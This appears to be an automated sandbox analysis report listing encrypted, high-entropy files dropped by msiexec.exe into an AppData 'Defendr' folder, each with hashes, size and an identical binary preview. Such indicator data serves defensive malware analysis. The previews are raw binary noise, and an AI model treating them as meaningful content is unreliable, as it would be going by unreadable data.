Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv23.0.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	93286
Entropy (8bit):	7.998129703606323
Encrypted:	true
SSDEEP:	1536:BW6Yq0PMa088aar1sa5V7Ps9xFtpPd+FdTHxjEf6xWwOJM11yZlbLAn:orq0PM4ar1saL7sxFtFdUZxQf60wOJMj
MD5:	1102C549BF4ACBE4400788190D6FAFE7
SHA1:	1625A297A43DBAFFB10C3F608D79E964C86039F8
SHA-256:	DAA3E8880F7B5A880F77D81700A439A5A64F59FF3E6B879BAD5CAA497AE3262B
SHA-512:	25537A6AC18D883FDB6A55E8B4BF08EE21C3E31006F618EF1B5FAB3042CF3B5CD234FBFA0D99E20B6713A5A441CD033B4F7C28C874288BD256DE016C6B8335B2
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv23.1.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	32829
Entropy (8bit):	7.994035272067815
Encrypted:	true
SSDEEP:	768:BW6NBXvNQv2HVaVV93algtK1sOFSbFhSTEMKT:BW67VBVaD93algtK1nFXS
MD5:	5A706F42F9089D7AA5E568D189BD1BCF
SHA1:	F03514F3496ADA198C372E2322F832F3FA177473
SHA-256:	DCA0BF36CA8F7107FDB544AB5EC0B0DBE0368EE867AA49C5DA83EFF03A8E1502
SHA-512:	C6B1D36BF229980B605B4253C87A4AC1F36D40F857FF13E08978C764606696D2F05F99B5D5471DA71111B046611E796076C49B4510C4D69D904CB2BC652BB345
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv24.0.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	63980
Entropy (8bit):	7.997454343210385
Encrypted:	true
SSDEEP:	1536:BW6uQa7kqzEk9NIgRdJQxSdbRiLiW9RoLyCWjkL5YKG:oDQvqzEk9NIuRbRi2a8kGG
MD5:	1CA74733AE8ABBD526A623D582E90A86
SHA1:	260FEF5EF8B976E4F4AFC691A68F234042B4CD9A
SHA-256:	F717F00037738CA385C9AE1B3E037E0625E85FC98C8DE173DBF7AB7022890D2F
SHA-512:	B1AA1F49CD32BE6D3F7BBE786A58B784EC12F04A80723542A9C4BE8E46D7CCE3A71E5D680739B799786B2E29623CD81440697A2DFEBA9E84216B796342EF4AE3
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv24.1.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	42326
Entropy (8bit):	7.9961938809961035
Encrypted:	true
SSDEEP:	768:BW6NLQQa7c7qzEkQF2N2HxkNfRdcni5QNFVw5yv5aB2YsjpSU2/y5JMTPQokRgmi:BW6uQa7kqzEk9NIgRdJQxwQv5sMjp4yw
MD5:	E9FC5502E223B097FA82863E38696042
SHA1:	E9080049C173BFE988B52BFB2B282FF0ADB31653
SHA-256:	3EFD7525C6E1C07381ADC32A22B66EF88C64FF2E435685017E2496E6DE679537
SHA-512:	E34A02590B00F8E0D0B752C8915AF3EA8C3977CF5D7649B13EB905E17CE1BCA8BC4A0B8BCF0D638C1A87574967CA911FE644321A2A5F930CF320240193EF235A
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv25.0.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	98017
Entropy (8bit):	7.9982280992744155
Encrypted:	true
SSDEEP:	1536:BW6bKwZty86+ddw8GtnmjXy5UXfrVwuhLnT7vsyH7019PlMmX8N6z0WNumZKnzrN:oivpbGBPCV3jT70yH7019dMK8N6zrug2
MD5:	521EA1C6299FE47C3B8F46983A5F5F98
SHA1:	0CB2134FDFF277C7E673C7AAC0776DF32B81315A
SHA-256:	96DE6B919F013279A734B5227AE3338C63E18EF48C9C5994F9BA4856A53C52EC
SHA-512:	B3247B01D56B42DE678617C6B034FB28D753BD11BE374161ACFC85A8D407C898D57DFE72CAB97CD1E0DFD6728732D71358B8B8E1F7F022F1507F75618EA0C157
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv25.1.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	37706
Entropy (8bit):	7.995482814550673
Encrypted:	true
SSDEEP:	768:BW6N6Sm2VBZlYuqrq08AqILNc9asm3sAdnRlyPIHH/DMP:BW6Jm8HlYuqm0e2NTsosAdnJr6
MD5:	7BD0788C2A434C64645AB556C23A14BF
SHA1:	457BF437B71E509C067F9CA989F06507B36C7D41
SHA-256:	64074ED1669C55D065ACC85368F2BD1CEE2CC99A0DEF52DED9FEE6AF4B03E9A1
SHA-512:	535CABFB8E76FC86CE01E0C7AF284C49CC906C8C2C20FDCB567C8F198D913B41980C528E8C12B1AE18D76DB65E4353D76FBD7B260544539197D35CE7161631AD
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv26.0.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	53037
Entropy (8bit):	7.996873678733814
Encrypted:	true
SSDEEP:	768:BW6NA4KWz3oik5y3UcX52+LgquI5dv/Hxg+kzQqkq9qIrk/wXjmvkMcrbDGOh8c:BW6nKaoJy3352+p5dSHpqojmvNwZ8c
MD5:	7DC228BB1FB3CCFC2A310127002336EB
SHA1:	D8B6ECD339DC0286DEC5CD9EF5211849AF3B56AC
SHA-256:	4C3198AB4B08000E629C09B7C8CF396477C67136156FB0335D6BD09749D1AF0C
SHA-512:	711A83B7B03D07131D1500B8941A7DF06695186AA7871D461C01160EC55B7BDD5B9C80A9175B59CB1E89CBD2CDB59CFE8C45B45F1D12F3AA44AF7812F755F154
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv26.1.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	31189
Entropy (8bit):	7.994281553790379
Encrypted:	true
SSDEEP:	768:BW6N6GF0a5kjHtVUFLBwiFwBsfmV6dV2e29OQoQnx:BW6FF95kj/UpfejQdV2e2YQ1nx
MD5:	45DBEEB0F96E14C59F803893BD7746E7
SHA1:	A02C2C8B1394E30B8D22B1A7941D510EF17CC7D3
SHA-256:	4D8E74DD8F673A15AE145743B068776EA448DB5C5BA3998AA52284EE7CA0E49E
SHA-512:	7D6B2CB69F7B8177410D415DA23F9187DC8BA9E4710847A77799249221A7E61A30F1A07E5971B6D6FE1506DC7CB8A2E46D4FAC338905A3F129A7D2514F9DF67C
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv27.0.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	98416
Entropy (8bit):	7.99821113686373
Encrypted:	true
SSDEEP:	1536:BW6r3JOrGfAQmGi8dFZNWZhY20Qn88JROOmjjGuiXbRq2+FEHNSijyUi3Jh5dQZj:ok3JpcOWZjHXkuuMRq2+Ojy93sx
MD5:	C0D13EA141E94E3B4C3B46379BC86F2D
SHA1:	D2F48AE05CBB726F2428E4ED7B3524954745932B
SHA-256:	AB6FD893CFA08AD52384D6EE973A065BFEF0A9031B166B776CFEA50E82BEF86E
SHA-512:	DD1F2E8A6277DE2358CAA109504C696576A70E01A04E447D7FD720CD19D83EAF6B39D1DA0F1542697AF7D0AC9046A3D09E1E00BA0A33F4C85F1EFF230421C1CC
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv27.1.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	32641
Entropy (8bit):	7.994716793370817
Encrypted:	true
SSDEEP:	768:BW6NCOggLFFiSgWEJEFkM84MP6zbHqIdrlPtBskaz0Qo8ME:BW6TKAxOGOIhllBsXGk
MD5:	E88B3293685B5BD4921F00B41181F2B0
SHA1:	465E6B6356B6DEBE9AEFD74AF6EF2E482D1A7459
SHA-256:	C215E0660D9D639C4815C9E21033CAE69A2B3640F713FBD131983E049AC12B0D
SHA-512:	F3ACAA0D303CC7F16FF83DA358AC905E6E8545D59097216CB9C9749F4BF6D3C6BD10731EA381CF2EA48A280EA48CB387629E19248C1E4927CAFD33799B5BC1EA
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv28.0.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	107963
Entropy (8bit):	7.998383266675414
Encrypted:	true
SSDEEP:	3072:orlF3F4IMAjjWsL6V2RpsNDJ33lblD7a+dDZWQVxztybt:glb4IMAfb6V+EDJFbN7jrx2t
MD5:	2C0C638204B7B944014072E9BD661C2E
SHA1:	0DB79474902F51D17F4B759ECC9B8832D010C95E
SHA-256:	152C8CEBCE73C59ADFF0CB6AF008E4FACF0645F48A23BB39284A322789515C4C
SHA-512:	5FED045ACC6798F22303475600F0A8A14232EE1A1B16A6A08A1AE02BCB1B51A1EE98F49563196289C90F6CE08F18453473BA974A7B5E0DB67B676447E4F4706A
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv28.1.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	40990
Entropy (8bit):	7.995348789067283
Encrypted:	true
SSDEEP:	768:BW6NYJjINNX/HWigAIDxhD18g20LVLDFyvWLeRkJxa7WdqNFnKbYl45ZHQ9:BW6QjIvX/j+DxhDL0vWqR4uWtEl4LHg
MD5:	543591DCBA79B507C11B753FDD53D763
SHA1:	2857BC187AE459798602C1934DD5CB8D0AD1A38C
SHA-256:	836B6F24C024DB7707C7305AA84A15B2225E6ADB4470D26B3112FA8FA87197A0
SHA-512:	45597AD2995C6279145EABC6720AA36ED5288FDA7C09DFAE160EDADDF6EF40A895415E9E9515469A228CEB12DF5E01614C078D57A10D47E62FAA4D8685FCDB19
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv29.0.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	96113
Entropy (8bit):	7.998130790714943
Encrypted:	true
SSDEEP:	1536:BW6HF9pfWVCSg8i3ClEmOZ5B5rDTIxJl0vyJcTdsOfX9pwnk3OLrh5:o8F9p8CSghSlfsB5XTkJFir/L8k3O3
MD5:	7C68CFB5F5AF152F8D9C45C83968F9E5
SHA1:	CF14E3B400F43071E3611D692E50B43B5E7FB0BA
SHA-256:	68A83A6DEFE3F339E116965863EF4C536D61503DD87F6ACB3C1ECB18B716821B
SHA-512:	CE30831FC5C2280BE067D6F1C51CC739B9E1CC152C8296E439C055E817C408C8CABB621A6B0E1D86858C9214E6929C5EF39A910663FABEC5199B81297A9587C9
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv29.1.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	35504
Entropy (8bit):	7.995373807133793
Encrypted:	true
SSDEEP:	768:BW6Nb1X9c/jyps46MdwPtxJBAwLGDIJIvQiDHqyAYL7sH5f7duO38Tbz02PZ:BW6F1Nc/jyCfMdCxJTLG8IvQ4HH9If5Q
MD5:	737A1374A5503F702CD7BEFFB402D3D2
SHA1:	1A780B0A10595593080718EE112922ADFD48F6D9
SHA-256:	9B18FDD03F15144E86DF6AE41BF04793AC713BCE12155D2AE55274CAC80093CA
SHA-512:	E47A9153566D17BC20E6E69DEB7702AECC8D6BDE75674616AB00F64B43F363E8ADDA42B09B663E398FAED5CF6920D18F5BDF9D757A5F438C39C6CC87D353E215
Malicious:	false
